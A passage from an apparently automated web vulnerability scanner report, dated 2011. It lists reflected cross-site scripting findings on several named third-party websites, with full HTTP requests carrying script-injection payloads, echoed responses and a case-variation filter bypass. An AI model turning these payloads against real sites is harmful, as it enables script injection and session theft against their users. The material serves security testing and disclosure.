   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/genericCommentWrapper2.php/1b0f4'><script>alert(1)</script>82f6491ebe'>
...[SNIP]...

1.35. http://intensedebate.com/js/getUserMenu.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/getUserMenu.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26d34'><script>alert(1)</script>614bd29ba59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getUserMenu.php26d34'><script>alert(1)</script>614bd29ba59 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4802

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getUserMenu.php26d34'><script>alert(1)</script>614bd29ba59'>
...[SNIP]...

1.36. http://intensedebate.com/js/getUserMenu.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/getUserMenu.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31bfc'><script>alert(1)</script>3a235cf8e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getUserMenu.php/31bfc'><script>alert(1)</script>3a235cf8e91 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4800

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getUserMenu.php/31bfc'><script>alert(1)</script>3a235cf8e91'>
...[SNIP]...

1.37. http://intensedebate.com/logmein [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /logmein

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9a80'><script>alert(1)</script>d035da00fb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /logmeind9a80'><script>alert(1)</script>d035da00fb9 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/empty.phpd43c7'%3E%3Cscript%3Ealert(1)%3C/script%3Eb83048b6d9a
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __utmb=239309019.1.10.1296494785; __qca=P0-1269071080-1296494784940

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 20:54:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4700

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/logmeind9a80'><script>alert(1)</script>d035da00fb9'>
...[SNIP]...

1.38. http://intensedebate.com/logmein [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /logmein

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a1ad4'><script>alert(1)</script>8d1e3f38acf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /logmein?a1ad4'><script>alert(1)</script>8d1e3f38acf=1 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/empty.phpd43c7'%3E%3Cscript%3Ealert(1)%3C/script%3Eb83048b6d9a
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __utmb=239309019.1.10.1296494785; __qca=P0-1269071080-1296494784940

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 20:54:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7938

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/logmein?a1ad4'><script>alert(1)</script>8d1e3f38acf=1'>
...[SNIP]...

1.39. http://itknowledgehub.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://itknowledgehub.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db65"><script>alert(1)</script>956356ca0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4db65\"><script>alert(1)</script>956356ca0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4db65"><script>alert(1)</script>956356ca0d=1 HTTP/1.1
Host: itknowledgehub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:25:46 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://itknowledgehub.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 128082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="http://itknowledgehub.com/?4db65\"><script>alert(1)</script>956356ca0d=1">
...[SNIP]...

1.40. http://jlinks.industrybrains.com/jsct [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 381c7<script>alert(1)</script>05017fb37be was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=890&ct=ECT_NEWS_TECH_NEWS_WORLD381c7<script>alert(1)</script>05017fb37be&tr=ECT_NEWS_ARTICLES&num=1&layt=630x90&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 17:11:25 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 31 Jan 2011 17:11:25 GMT
Content-Type: application/x-javascript
Content-Length: 95

// Error: Unknown old section ECT_NEWS_TECH_NEWS_WORLD381c7<script>alert(1)</script>05017fb37be

1.41. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e58ef<script>alert(1)</script>33a03b418b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=890&ct=ECT_NEWS_TECH_NEWS_WORLD&tr=ECT_NEWS_ARTICLES&num=1&layt=630x90&fmt=simp&e58ef<script>alert(1)</script>33a03b418b2=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 17:11:27 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 31 Jan 2011 17:11:27 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter e58ef<script>alert(1)</script>33a03b418b2

1.42. http://jlinks.industrybrains.com/jsct [tr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 39215<script>alert(1)</script>040828dfd29 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=890&ct=ECT_NEWS_TECH_NEWS_WORLD&tr=ECT_NEWS_ARTICLES39215<script>alert(1)</script>040828dfd29&num=1&layt=630x90&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 17:11:26 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 31 Jan 2011 17:11:26 GMT
Content-Type: application/x-javascript
Content-Length: 92

// Error: Site 890 has no section ECT_NEWS_ARTICLES39215<script>alert(1)</script>040828dfd29

1.43. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23b8f"><script>alert(1)</script>8ab429ee252 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews23b8f"><script>alert(1)</script>8ab429ee252/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:00 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIG; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:00 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews23b8f"><script>alert(1)</script>8ab429ee252/runofnetwork/160x600/autnwsrlsttch/ss/a/990304761/x10/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.44. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7571"><ScRiPt>alert(1)</ScRiPt>aba5c424809 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/d7571"><ScRiPt>alert(1)</ScRiPt>aba5c424809/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:51:01 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011Pk0iDO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1408
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 20:52:01 GMT;path=/

<IFRAME SRC="http://ad.doubleclick.net/adi/N3158.247RealMedia/B4708174.27;sz=160x600;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/d7571"><ScRiPt>alert(1)</ScRiPt>aba5c424809/160x600/autnwsrlsttch/ss/a/L7/492651054/x10/USNetwork/BCN2010070180_063_Staples/123_160.html/726348573830307044726341416f7670?;ord=492651054?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=
...[SNIP]...

1.45. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3acec"%3b659808a9e9b was submitted in the REST URL parameter 5. This input was echoed as 3acec";659808a9e9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork3acec"%3b659808a9e9b/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:03 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIJO2016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 875
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:03 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<!--
mm_client = "87268797280";
mm_channel = "ectnews/runofnetwork3acec";659808a9e9b/160x600/autnwsrlsttch/ss/a/L7";
//-->
...[SNIP]...

1.46. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b9b0"><script>alert(1)</script>0c74033a4fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork8b9b0"><script>alert(1)</script>0c74033a4fe/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIIO2016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 925
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:02 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=ectnews/runofnetwork8b9b0"><script>alert(1)</script>0c74033a4fe/160x600/autnwsrlsttch/ss/a/L7&mm_flag=">
...[SNIP]...

1.47. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88700"%3b3040819f01d was submitted in the REST URL parameter 6. This input was echoed as 88700";3040819f01d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x60088700"%3b3040819f01d/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:09 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIPO1016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 875
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:09 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
